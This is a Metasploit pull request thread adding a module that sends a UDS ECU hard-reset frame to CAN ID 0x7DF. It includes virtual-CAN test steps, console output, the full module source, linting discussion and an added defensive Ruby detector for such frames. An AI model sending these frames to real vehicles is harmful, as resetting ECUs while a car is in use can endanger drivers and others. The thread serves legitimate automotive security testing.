Add ECU Hard Reset for hwbridge #15707

Merged
merged 16 commits into from
Sep 28, 2021
@shipcod3 shipcod3 commented Sep 24, 2021

Introduction

This module performs a hard reset in the ECU Reset Service Identifier (0x11).

Verification Steps

Fire up virtual CAN bus:

  1. sudo modprobe can
  2. sudo modprobe vcan
  3. sudo ip link add dev vcan0 type vcan
  4. sudo ip link set up vcan0

Launch msf:

  1. Start msfconsole
  2. use auxiliary/server/local_hwbridge
  3. set uripath testbus
  4. run
  5. use auxiliary/client/hwbridge/connect
  6. set targeturi testbus

Options

ARBID
CAN ID to perform ECU Hard Reset (Default: 0x7DF)

CANBUS
CAN Bus to perform scan on, defaults to connected bus

Scenarios

Using UDS simulator for testing ECU hard reset:

msf5 auxiliary(client/hwbridge/connect) > run
[*] Running module against 127.0.0.1

[*] Attempting to connect to 127.0.0.1...
[*] Hardware bridge interface session 1 opened (127.0.0.1 -> 127.0.0.1) at 2019-09-11 04:59:40 -0700
[+] HWBridge session established
[*] HW Specialty: {"automotive"=>true}  Capabilities: {"can"=>true, "custom_methods"=>true}
[!] NOTICE:  You are about to leave the matrix.  All actions performed on this hardware bridge
[!]          could have real world consequences.  Use this module in a controlled testing
[!]          environment and with equipment you are authorized to perform testing on.
[*] Auxiliary module execution completed
msf5 auxiliary(client/hwbridge/connect) > sessions

Active sessions
===============

  Id  Name  Type                   Information  Connection
  --  ----  ----                   -----------  ----------
  1         hwbridge cmd/hardware  automotive   127.0.0.1 -> 127.0.0.1 (127.0.0.1)

msf5 auxiliary(client/hwbridge/connect) > sessions -i 1
[*] Starting interaction with 1...

hwbridge > run post/hardware/automotive/ecu_hard_reset CANBUS=vcan0

[*] Performing ECU Hard Reset...

You can use candump to verify the CAN messages being sent:

└─$ candump vcan0
  vcan0  7DF   [8]  02 11 01 00 00 00 00 00

UDS Server Output

└─$ ./uds-server -v -V "PWN3D" vcan0            
Using CAN interface vcan0
Fuzz level set to: 0
Pkt: 7DF#02 11 01 00 00 00 00 00 
Unhandled mode/sid: ECU Reset
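
The frame in the candump output above is an ISO-TP single frame (length 2) carrying UDS ECUReset (0x11) with sub-function 0x01 (hardReset), sent to the functional request ID 0x7DF. As an added example (not code from this pull request or from Metasploit), the following Ruby decodes candump lines and flags such requests when monitoring a bus; the helper names `parse_candump`, `ecu_reset_request` and `scan`, and every sample frame except the first, are constructed for illustration.

```ruby
# Added example with hypothetical helper names; these are not Metasploit APIs.
RESET_TYPES = { 0x01 => 'hardReset', 0x02 => 'keyOffOnReset', 0x03 => 'softReset' }.freeze
FUNCTIONAL_ID = 0x7DF # OBD-II functional (broadcast) request ID, the module's default ARBID

# Parse one line of default candump output: "  vcan0  7DF   [8]  02 11 01 ..."
def parse_candump(line)
  m = line.match(/^\s*(\S+)\s+([0-9A-Fa-f]+)\s+\[(\d+)\]\s+((?:[0-9A-Fa-f]{2}\s*)*)$/)
  return nil unless m

  data = m[4].split.map { |b| b.to_i(16) }
  return nil unless data.length == m[3].to_i # byte count must match the DLC

  { iface: m[1], arb_id: m[2].to_i(16), data: data }
end

# Return a finding if the frame is an ISO-TP single frame carrying ECUReset (SID 0x11).
def ecu_reset_request(frame)
  pci, sid, sub = frame[:data]
  return nil if pci.nil? || (pci >> 4) != 0 # high nibble 0 = single frame
  return nil if (pci & 0x0F) < 2 || sid != 0x11 || sub.nil?

  {
    arb_id: frame[:arb_id],
    reset_type: RESET_TYPES.fetch(sub & 0x7F, 'other'), # bit 7 = suppress positive response
    response_suppressed: (sub & 0x80) != 0,
    functional: frame[:arb_id] == FUNCTIONAL_ID
  }
end

# Scan a multi-line candump capture and return every ECUReset request found.
def scan(log)
  log.each_line.filter_map { |l| (f = parse_candump(l)) && ecu_reset_request(f) }
end

# Constructed sample capture; only the first frame appears in the PR description.
SAMPLE = <<~LOG
  vcan0  7DF   [8]  02 11 01 00 00 00 00 00
  vcan0  7E0   [8]  02 10 03 00 00 00 00 00
  vcan0  7E0   [8]  02 11 83 00 00 00 00 00
  vcan0  7E8   [8]  03 7F 11 7F 00 00 00 00
LOG

scan(SAMPLE).each do |hit|
  printf("ECUReset %-13s arbid=0x%03X functional=%s suppressed=%s\n",
         hit[:reset_type], hit[:arb_id], hit[:functional], hit[:response_suppressed])
end
```

A reset request addressed to 0x7DF reaches every ECU listening on the functional ID, so the `functional` flag is the field to alert on first.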

@shipcod3
Contributor Author

Hmm, I am not sure why msftidy keeps on failing here despite not getting errors from my end.

@adfoster-r7 adfoster-r7 added the needs-linting The module needs additional work to pass our automated linting rules label Sep 24, 2021
@github-actions

Thanks for your pull request! Before this pull request can be merged, it must pass the checks of our automated linting tools.

We use Rubocop and msftidy to ensure the quality of our code. This can be run from the root directory of Metasploit:

rubocop <directory or file>
tools/dev/msftidy.rb <directory or file>

You can automate most of these changes with the -a flag:

rubocop -a <directory or file>

Please update your branch after these have been made, and reach out if you have any problems.

@adfoster-r7
Contributor

The bot should hopefully shed some light on how to fix the linting issues 👍

@shipcod3
Contributor Author

I guess it is failing because of this error:

modules/post/hardware/automotive/ecu_hard_reset.rb - [INFO] No CVE references found. Please check before you land!

@dwelch-r7
Contributor

> I guess it is failing because of this error:
>
> modules/post/hardware/automotive/ecu_hard_reset.rb - [INFO] No CVE references found. Please check before you land!

No that's informational only, this is the relevant error

1 file inspected, 6 offenses detected, 5 offenses auto-correctable
modules/post/hardware/automotive/ecu_hard_reset.rb - [ERROR] Rubocop failed. Please run rubocop -a modules/post/hardware/automotive/ecu_hard_reset.rb and verify all issues are resolved

@shipcod3
Contributor Author

shipcod3 commented Sep 27, 2021

I see, I am getting these errors when I run rubocop -a modules/post/hardware/automotive/ecu_hard_reset.rb:

Inspecting 1 file
C

Offenses:

modules/post/hardware/automotive/ecu_hard_reset.rb:1:1: C: Style/FrozenStringLiteralComment: Missing frozen string literal comment.
##
^
modules/post/hardware/automotive/ecu_hard_reset.rb:6:1: C: Style/Documentation: Missing top-level class documentation comment.
class MetasploitModule < Msf::Post
^^^^^
modules/post/hardware/automotive/ecu_hard_reset.rb:7:3: C: Metrics/MethodLength: Method has too many lines. [11/10]
  def initialize(info = {}) ...
  ^^^^^^^^^^^^^^^^^^^^^^^^^

rubocop then indents a lot of spaces in the info and register_options.

I fixed it with 2 indentations and then made changes here, and it still fails.

@adfoster-r7
Contributor

This is the output I get after running Rubocop locally, with the same command you posted:

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Post
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'ECU Hard Reset',
        'Description' => ' This module performs hard reset in the ECU Reset Service Identifier (0x11)',
        'License' => MSF_LICENSE,
        'Author' => ['Jay Turla'],
        'Platform' => ['hardware'],
        'SessionTypes' => ['hwbridge']
      )
    )
    register_options([
      OptString.new('ARBID', [false, 'CAN ID to perform ECU Hard Reset', '0x7DF']),
      OptString.new('CANBUS', [false, 'CAN Bus to perform scan on, defaults to connected bus', nil])
    ])
  end

  def run
    unless client.automotive
      print_error('The hwbridge requires a functional automotive extention')
      return
    end
    print_status('Performing ECU Hard Reset...')
    client.automotive.cansend(datastore['CANBUS'], datastore['ARBID'], '0211010000000000')
  end

end

After that, it's still missing the stability notes in the metadata section:

        # All new modules must contain the below information. See below for more details for allowed values
        'Notes' => {
          'Stability' => [...],
          'Reliability' => [...],
          'SideEffects' => [...]
        }

Documentation for that is here: https://github.com/rapid7/metasploit-framework/wiki/Definition-of-Module-Reliability,-Side-Effects,-and-Stability 👍

@github-actions

Thanks for your pull request! Before this can be merged, we need the following documentation for your module:

@shipcod3
Contributor Author

Finally! I have also added the documentation.

Contributor

@adfoster-r7 adfoster-r7 left a comment

Thanks! Will land this shortly

@adfoster-r7 adfoster-r7 merged commit 26e317d into rapid7:master Sep 28, 2021
@adfoster-r7
Contributor

Release Notes

Adds a new ecu_hard_reset hardware module which performs a hard reset in the ECU Reset Service Identifier (0x11)

@adfoster-r7 adfoster-r7 added rn-modules release notes for new or majorly enhanced modules and removed needs-docs needs-linting The module needs additional work to pass our automated linting rules labels Sep 28, 2021
@shipcod3 shipcod3 deleted the patch-28 branch September 29, 2021 01:18